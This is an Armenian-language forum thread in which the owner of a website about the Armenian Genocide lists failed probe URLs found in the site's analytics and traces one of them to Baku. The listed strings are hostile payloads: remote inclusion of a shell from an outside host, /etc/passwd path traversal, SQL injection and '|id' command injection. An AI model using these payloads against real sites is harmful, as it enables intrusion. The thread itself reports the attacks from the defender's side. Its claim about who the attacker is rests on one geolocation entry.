Egern.net Posted August 25, 2006 Report Share Posted August 25, 2006 Հայեր ջան, պատմեմ մի շաաատ հետաքրքիր դեպք: Ուրեմն, մեր սայթը (www.egern.net) Հայոց Ցեղասպանության մասին ա: Ու մեր սայթում ես մի հատ counter եմ դրել Google Analytics-ից: Էդ ամեն պետքական-անպետք բան ցույց ա տալիս, այդ թվում, թե սայթի որ էջերն են մտել մեր visitor-ները: Այսօր նայեցի, տեսնեմ մտել են մի շարք էջեր, որոնք իրականում գոյություն չունեն, ու հետևաբար մեր սայթը պիտի ցույց տար Error404: File not found. Հիմա ներկայացնում եմ էդ գոյություն չունեցող լինկերի ոչ լրիվ ցանկը. (բոլորի սկիզբը` http://www.egern.net/) /?view=article&aID=http://hrs-xss.narod.ru/shell'>http://hrs-xss.narod.ru/shell /?view=article&aID=wqewqeqweqewq /?view=article&aID=|id; /?view=articles&aID=-2+union+select+null/* /?view=articles&aID=2+union+select+null/* /?view=ewrwe&year=sh.php&dir=http://hrs-xss.narod.ru/ /?view=passwd&aID=2&dir=/etc/ /?view=passwd&content=/etc/ /?view=passwd&dir=/etc/ /?view=spring&year=0&dir=/etc /?view=spring&year=06&page=2' /?view=spring&year=06&page=|id; /?view=summer&year=05'&dir=/etc/ /?view=summer&year=passwd&dir=../etc/passwd /?view=summer&year=passwd&dir=/etc/ /?view=summer&year=shell.php&dir=http://hrs-xss.narod.ru/ Ով որ PHP-ի հետ մի քիչ շփվել ա, միանգամից կնկատի, որ էս բոլոր լինկերը սայթում թերություն (bug) գտնելու փորձեր են: Օրինակ ցանկում գրված երկրորդ լինկը MySQL-ի error ստանալու անհաջող փորձ ա, քանի որ մեր սայթում MySQL չկա: Իսկ օրինակ վերջինը փորձում ա dir արգումենտի միջոցով shell գցել սայթի մեջ, բայց քանի որ մեր գրած PHP սկրիպտները լրացուցիչ արգումենտներ չեն «հասկանում», ապա դա էլ անհաջող փորձ ա: Եվ այլն... Ստացվում ա, որ մեկը (կամ մի քանիսը) փորձում են «ճեղք» գտնել սայթի մեջ, որ քանդեն: Բայց առայժմ չի հաջողվում: Հիմա առաջանում ա հարց. իսկ ով ա էդ փորձողը.... Ուրեմն Google Analytics-ը հնարավորություն ա տալիս տարբեր ստատիստիկաների հատվածները «խաչել» իրար հետ, որպեսզի իմանաս, թե, օրինակ, Internet Explorer-ով մտնող visitor-ները ինչ screen resolution ունեն և այլն և այլն: Այ այս ֆունկցիայի միջոցով ես վերոնշյալ լինկերից մեկը խաչեցի մի շարք ստատիստիկաների հետ: Ուրեմն բերեց. Page: "/?view=summer&year=passwd&dir=/etc/" City: Baku Network Location: BakTelecom Browser: Internet Explorer 6.0 Platform: Microsoft Windows XP Այ թե ինչ.... Ուրեմն ադրբեջանցիները փորձում են քանդել Եղեռնին վերաբերվող սայթը: Բայց չի ստացվում, համենայն դեպս առայժմ (չնայած գրեթե վստահ եմ, որ այդպես էլ ոչ մի թերություն չեն հայտնաբերի, իսկ մեր սերվերը շատ պաշտպանված ա)........... P>S> Հարգելի մոդերատորներ, եթե այս թեման այնքան էլ ճիշտ տեղում չի սարքված, խնդրում եմ տեղափոխել Quote Link to post Share on other sites
astg Posted August 29, 2006 Report Share Posted August 29, 2006 Պարզ է.... Նրանք չեն ուզում հասկանան, որ ինչ ուզում են քանդեն, պատմությունն ու փաստերը մեկ է չեն քանդվի, ոչ էլ հայը կմոռանա երբեք Եղեռնի մասին Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.